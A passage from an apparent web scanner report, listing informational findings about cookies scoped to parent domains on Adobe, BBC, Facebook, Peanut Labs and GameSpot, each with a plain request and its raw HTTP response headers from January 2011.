HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:25:22 GMT Server: JRun Web Server Set-Cookie: CFID=7126392;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/ Set-Cookie: CFTOKEN=132e3b7190093aee Set-Cookie: DYLANSESSIONID=48306 Set-Cookie: UID=1C5C2077%2D9490 Set-Cookie: CFAUTHORIZATION_adobe_com Environment: webapp-da1-02.corp.adobe Content-Language: en-US Content-Language: en-US Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Set-Cookie: DylanApp-BigIP=223114250 Connection: close Vary: Accept-Encoding, User-Agent <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.41. http://www.adobe.com/cfusion/marketplace/index.cfm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/marketplace |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5DBCC0%2DAF9A
%2D535E%2D2CEE49CDAB EF82D1;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/cfusion/
Request
GET /cfusion/marketplace Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:25:32 GMT Server: JRun Web Server Set-Cookie: CFID=6727968;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/ Set-Cookie: CFTOKEN=b3b6fb7bf15b5dba Set-Cookie: DYLANSESSIONID=4830c Set-Cookie: UID=1C5DBCC0%2DAF9A Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-11.corp.adobe Content-Language: en-US Content-Language: en-US Set-Cookie: DylanApp-BigIP=877425674 Connection: close Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <he ...[SNIP]... |
9.42. http://www.adobe.com/cfusion/membership/index.cfm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/membership/index |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5A140F%2DD895
%2D113E%2D36E6ED9503 82D262;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/cfusion/
Request
GET /cfusion/membership/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:08 GMT Server: JRun Web Server Set-Cookie: CFID=6659512;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/ Set-Cookie: CFTOKEN=f4347a9052ead450 Set-Cookie: DYLANSESSIONID=48309 Set-Cookie: UID=1C5A140F%2DD895 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: false Environment: webapp-da1-11.corp.adobe Content-Language: en-US Content-Language: en-US location: https://www.adobe.com Set-Cookie: DylanApp-BigIP=877425674 Content-Length: 0 Connection: close |
9.43. http://www.adobe.com/cfusion/membership/logout.cfm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/membership |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5A9C8D%2DB2A1
%2D7B91%2D5082B84980 5CBB1C;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/cfusion/
Request
GET /cfusion/membership Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:12 GMT Server: JRun Web Server Set-Cookie: CFID=7115771;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/ Set-Cookie: CFTOKEN=802706847268b08f Set-Cookie: DYLANSESSIONID=48301 Set-Cookie: UID=1C5A9C8D%2DB2A1 Set-Cookie: CFAUTHORIZATION_adobe_com Set-Cookie: CFAUTHORIZATION_adobe_com Set-Cookie: RMID=;domain=.adobe.com Set-Cookie: SCREENNAME=;domain=.adobe Set-Cookie: AUID=;domain=.adobe.com Set-Cookie: MM_ESD=;domain=.adobe.com Set-Cookie: MM_TRIALS=;domain=.adobe Set-Cookie: ADC_MEMBER=;domain=.adobe Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: false Environment: webapp-da1-04.corp.adobe Content-Language: en-US Content-Language: en-US location: / Set-Cookie: DylanApp-BigIP=1179415562 Connection: close Vary: Accept-Encoding, User-Agent <html> <head> <title>Macromedia logout</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> |
9.44. http://www.adobe.com/cfusion/partnerportal/index.cfm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/partnerportal |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5BD2B1%2DB643
%2D8F26%2D79D72DC963 592023;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/cfusion/
Request
GET /cfusion/partnerportal Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:20 GMT Server: JRun Web Server Set-Cookie: CFID=7115774;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/ Set-Cookie: CFTOKEN=bf6594358230f035 Set-Cookie: DYLANSESSIONID=4830d Set-Cookie: UID=1C5BD2B1%2DB643 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-04.corp.adobe Content-Language: en-US Content-Language: en-US location: https://www.adobe.com Set-Cookie: DylanApp-BigIP=1179415562 Content-Length: 0 Connection: close |
9.45. http://www.adobe.com/cfusion/showcase/index.cfm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/showcase/index |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5FE0E3%2DBCB0
%2DEEB3%2D46E28AA62C 358F29;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/cfusion/
Request
GET /cfusion/showcase/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:25:27 GMT Server: JRun Web Server Set-Cookie: CFID=7076697;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/ Set-Cookie: CFTOKEN=45e90dab0cf2e0f4 Set-Cookie: DYLANSESSIONID=4830f Set-Cookie: UID=1C5FE0E3%2DBCB0 Set-Cookie: CFAUTHORIZATION_adobe_com Environment: webapp-da1-09.corp.adobe Content-Language: en-US Content-Language: en-US Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Set-Cookie: DylanApp-BigIP=1095529482 Connection: close Vary: Accept-Encoding, User-Agent <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <HTML xmlns="http://www.w3.org ...[SNIP]... |
9.46. http://www.adobe.com/cfusion/store/html/index.cfm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/store/html/index |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5EDFD1%2D05E9
%2D05EA%2DB2D2E9C8D3 280AAA;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/cfusion/
Request
GET /cfusion/store/html/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:36 GMT Server: JRun Web Server Set-Cookie: CFID=7135066;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/ Set-Cookie: CFTOKEN=eca79c32bda4a00c Set-Cookie: DYLANSESSIONID=4830c Set-Cookie: UID=1C5EDFD1%2D05E9 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-01.corp.adobe Content-Language: en-US Content-Language: en-US location: http://store1.adobe.com Set-Cookie: DylanApp-BigIP=172782602 Content-Length: 0 Connection: close |
9.47. http://www.adobe.com/cfusion/support/index.cfm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/support/index |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5AC330%2DA7F4
%2DF77C%2D6D6B4B0B15 9D5F71;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/cfusion/
Request
GET /cfusion/support/index Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 09 Jan 2011 05:25:13 GMT Server: JRun Web Server Set-Cookie: CFID=7126388;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/ Set-Cookie: CFTOKEN=d9b8ca39e6af1b8d Set-Cookie: DYLANSESSIONID=48309 Set-Cookie: UID=1C5AC330%2DA7F4 Set-Cookie: CFAUTHORIZATION_adobe_com Content-Type: text/html; charset=UTF-8 X-Adobe-Zip: true Environment: webapp-da1-02.corp.adobe Content-Language: en-US Content-Language: en-US location: https://www.adobe.com Set-Cookie: DylanApp-BigIP=223114250 Content-Length: 0 Connection: close |
9.48. http://www.adobe.com/events/main.jsp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /events/main.jsp |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- AWID=10.116.66.9
.1294550851826;path=/ ;domain=.adobe.com ;expires=Tue, 05-Jan-2021 21:27:31 GMT
Request
GET /events/main.jsp HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:27:31 GMT Server: Jetty/4.2.x (SunOS/5.10 sparc java/1.4.2_02) Set-Cookie: AWID=10.116.66.9 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=1c1o9aj6r4w3c Cache-Control: max-age=900 Expires: Sun, 09 Jan 2011 05:42:31 GMT Connection: close Vary: Accept-Encoding, User-Agent <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html x ...[SNIP]... |
9.49. http://www.bbc.co.uk/news/technology-12126880 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bbc.co.uk |
Path: | /news/technology-12126880 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- BBC-UID=048d5239a181
39fc2bddb11a61903f97 169352767050f19f02f9 f6849e4a283c0Mozilla%2f4 %2e0%20%28compatible%3b %20MSIE%207%2e0%3b %20Windows%20NT%206%2e0 %29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk; - BBC-UID=048d5239a181
39fc2bddb11a61903f97 169352767050f19f02f9 f6849e4a283c0Mozilla%2f4 %2e0%20%28compatible%3b %20MSIE%207%2e0%3b %20Windows%20NT%206%2e0 %29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;
Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=0 Content-Type: text/html Date: Sun, 09 Jan 2011 01:38:36 GMT Keep-Alive: timeout=10, max=797 Expires: Sun, 09 Jan 2011 01:38:36 GMT Connection: close Set-Cookie: BBC-UID=048d5239a181 Set-Cookie: BBC-UID=048d5239a181 Content-Length: 58551 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp <html xmlns="http://www.w3.org ...[SNIP]... |
9.50. http://www.e00.peanutlabs.com/js/iFrame/index.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /js/iFrame/index.php |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
- sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
- pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com
Request
GET /js/iFrame/index.php Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Cache-control: no-cache="set-cookie" Content-Type: text/html Date: Sun, 09 Jan 2011 01:30:21 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com Set-Cookie: AWSELB=052955471CE77 Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 112603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- If ...[SNIP]... |
9.51. http://www.facebook.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | / |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=A2E-W; path=/; domain=.facebook.com
- reg_fb_gate=http%3A%2F
%2Fwww.facebook.com%2F; path=/; domain=.facebook.com - reg_fb_ref=http%3A%2F
%2Fwww.facebook.com%2F; path=/; domain=.facebook.com - wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=A2E-W; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F Set-Cookie: reg_fb_ref=http%3A%2F Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:14:42 GMT Content-Length: 29866 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.52. http://www.facebook.com/2008/fbml previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /2008/fbml |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=zoSHS; path=/; domain=.facebook.com
- wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.53. http://www.facebook.com/Pogo previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /Pogo |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=DGAoC; path=/; domain=.facebook.com
- wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.54. http://www.facebook.com/campaign/impression.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /campaign/impression.php |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- campaign_click_url=
%2Fcampaign%2Fimpression .php%3Fcampaign_id %3D137675572948107 %26partner_id%3Dpandora .com%26placement%3Dlike _button%26extra_1%3Dhttp %253A%252F%252Fwww .pandora.com%252F%253Fext _reg%253D1%26extra_2%3DUS ; expires=Tue, 08-Feb-2011 01:23:22 GMT; path=/; domain=.facebook.com; httponly
Request
GET /campaign/impression.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.facebook.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: campaign_click_url= X-Cnection: close Date: Sun, 09 Jan 2011 01:23:22 GMT GIF89a.............!..... |
9.55. http://www.facebook.com/campaign/landing.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /campaign/landing.php |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- campaign_click_url=
%2Fcampaign%2Flanding.php ; expires=Tue, 08-Feb-2011 01:43:45 GMT; path=/; domain=.facebook.com; httponly
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url= Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:45 GMT Content-Length: 0 |
9.56. http://www.facebook.com/event.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /event.php |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=1_yt8; path=/; domain=.facebook.com
- next=http%3A%2F%2Fwww
.facebook.com%2Fevent.php %3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly - next_path=%2Fevent.php
%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly - wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /event.php?eid=13966 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=1_yt8; path=/; domain=.facebook.com Set-Cookie: next=http%3A%2F%2Fwww Set-Cookie: next_path=%2Fevent.php Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:20:48 GMT Content-Length: 0 |
9.57. http://www.facebook.com/logout.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /logout.php |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=77KNI; path=/; domain=.facebook.com
- roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
- wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=77KNI; path=/; domain=.facebook.com Set-Cookie: roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:18:12 GMT Content-Length: 0 |
9.58. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /pages/Packet-Storm |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=USH4D; path=/; domain=.facebook.com
- wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /pages/Packet-Storm Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=USH4D; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:14:19 GMT Content-Length: 27574 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.59. http://www.facebook.com/peanutlabs previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /peanutlabs |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=WrbZx; path=/; domain=.facebook.com
- wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.60. http://www.facebook.com/sitetour/connect.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /sitetour/connect.php |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsd=4KsQr; path=/; domain=.facebook.com
- wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /sitetour/connect.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4KsQr; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:17:22 GMT Content-Length: 0 |
9.61. https://www.facebook.com/login.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | https://www.facebook.com |
Path: | /login.php |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- datr=ac4nTYEA6yNv1vk
gFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly - lsd=tJ98F; path=/; domain=.facebook.com
- reg_fb_gate=https%3A%2F
%2Fwww.facebook.com %2Flogin.php; path=/; domain=.facebook.com - reg_fb_ref=https%3A%2F
%2Fwww.facebook.com %2Flogin.php; path=/; domain=.facebook.com - wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vk Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F Set-Cookie: reg_fb_ref=https%3A%2F Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.62. http://www.gamespot.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.gamespot.com |
Path: | / |
Issue detail
